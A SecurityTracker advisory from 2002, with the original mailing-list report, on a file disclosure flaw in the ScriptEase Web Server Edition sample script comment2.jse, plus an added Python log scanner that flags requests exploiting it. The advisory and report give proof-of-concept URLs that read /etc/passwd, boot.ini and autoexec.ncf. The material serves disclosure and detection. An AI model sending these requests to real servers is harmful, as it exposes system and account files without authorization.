SecurityTracker.com
Category:  Application (Web Server/CGI)  >  ScriptEase Web Server Edition
Vendors:  Nombas, Inc.
ScriptEase Web Server Edition Sample Script (comment2.jse) Discloses Files Located Anywhere on the Server to Remote Users
Date:  Feb 25 2002
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Description:  A file disclosure vulnerability was reported in the Nombas ScriptEase Web Server Edition. A remote user can view files located anywhere on the server.

It is reported that a remote user can exploit the 'comment2.jse' sample script to view files located anywhere on the server. URLs of the following type will reportedly trigger the flaw:

http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf


http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini

http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd

Impact:  A remote user can view files located anywhere on the server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nombas.com/us/download/ndownload.htm
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Aleksander Posmyk" <blah@omi.pl>
Message History:   None.
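
A log check for the request shape described above, added here as an example and not part of the original advisory or the vendor's code: it scans web server access logs for requests that invoke the ScriptEase CGI with comment2.jse followed by '+' and a second argument. The Common Log Format input, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<uri>\S+)(?: HTTP/[\d.]+)?"')
# CGI interpreter names as they appear in the advisory's three URLs.
CGI_RE = re.compile(r"/sewse(?:\.exe|\.nlm)?$", re.IGNORECASE)
SAMPLE_SCRIPT = "comment2.jse"


def extract_file_argument(uri):
    """Return the argument passed to comment2.jse after '+', or None."""
    path, sep, query = uri.partition("?")
    if not sep or not CGI_RE.search(path):
        return None
    # Assumption: percent-encoded forms (%2B, %5C) are flagged like the literal
    # ones; the advisory does not say how the server treats them.
    script, plus, argument = unquote(query).partition("+")
    name = script.lower().replace("\\", "/").rsplit("/", 1)[-1]
    if not plus or not argument or name != SAMPLE_SCRIPT:
        return None
    return argument


def scan(lines):
    """Yield (line_number, source_address, file_argument) for matching entries."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        argument = extract_file_argument(match.group("uri"))
        if argument is not None:
            yield number, line.split(" ", 1)[0], argument


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Feb/2002:10:00:01 +0100] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.77 - - [25/Feb/2002:10:00:05 +0100] "GET /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.0" 200 904',
    '192.0.2.77 - - [25/Feb/2002:10:00:09 +0100] "GET /cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse%2Bc:%5Cboot.ini HTTP/1.0" 200 211',
    '192.0.2.20 - - [25/Feb/2002:10:01:00 +0100] "GET /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse HTTP/1.0" 200 1300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Every request that passes any argument to the sample script is flagged, so hits need review against how the script is used on the site, if at all.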


 Source Message Contents

Date:  Sun, 24 Feb 2002 11:47:14 +0100
From:  "Aleksander Posmyk" <blah@omi.pl>
Subject:  ScriptEase:WebServer Edition vulnerability

 

Program: ScriptEase:WebServer Edition
Url: www.nombas.com
Problem: Any user can read files on server using one of example scripts: comment2.jse
Systems affected: Linux, Novell Netware, Windows 9x/NT/2k

Example:
Novell Netware:
http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
SET CLIENT FILE ...

Windows:
http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
[boot loader]
timeout=10
...

Linux:
http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
root:....

I found this in a default installation of Novell Netware 5.1...
Sorry for my English.
________________________________
Aleksander Posmyk - blah@lucyfer.omi.pl



Copyright 2002, SecurityGlobal.net LLC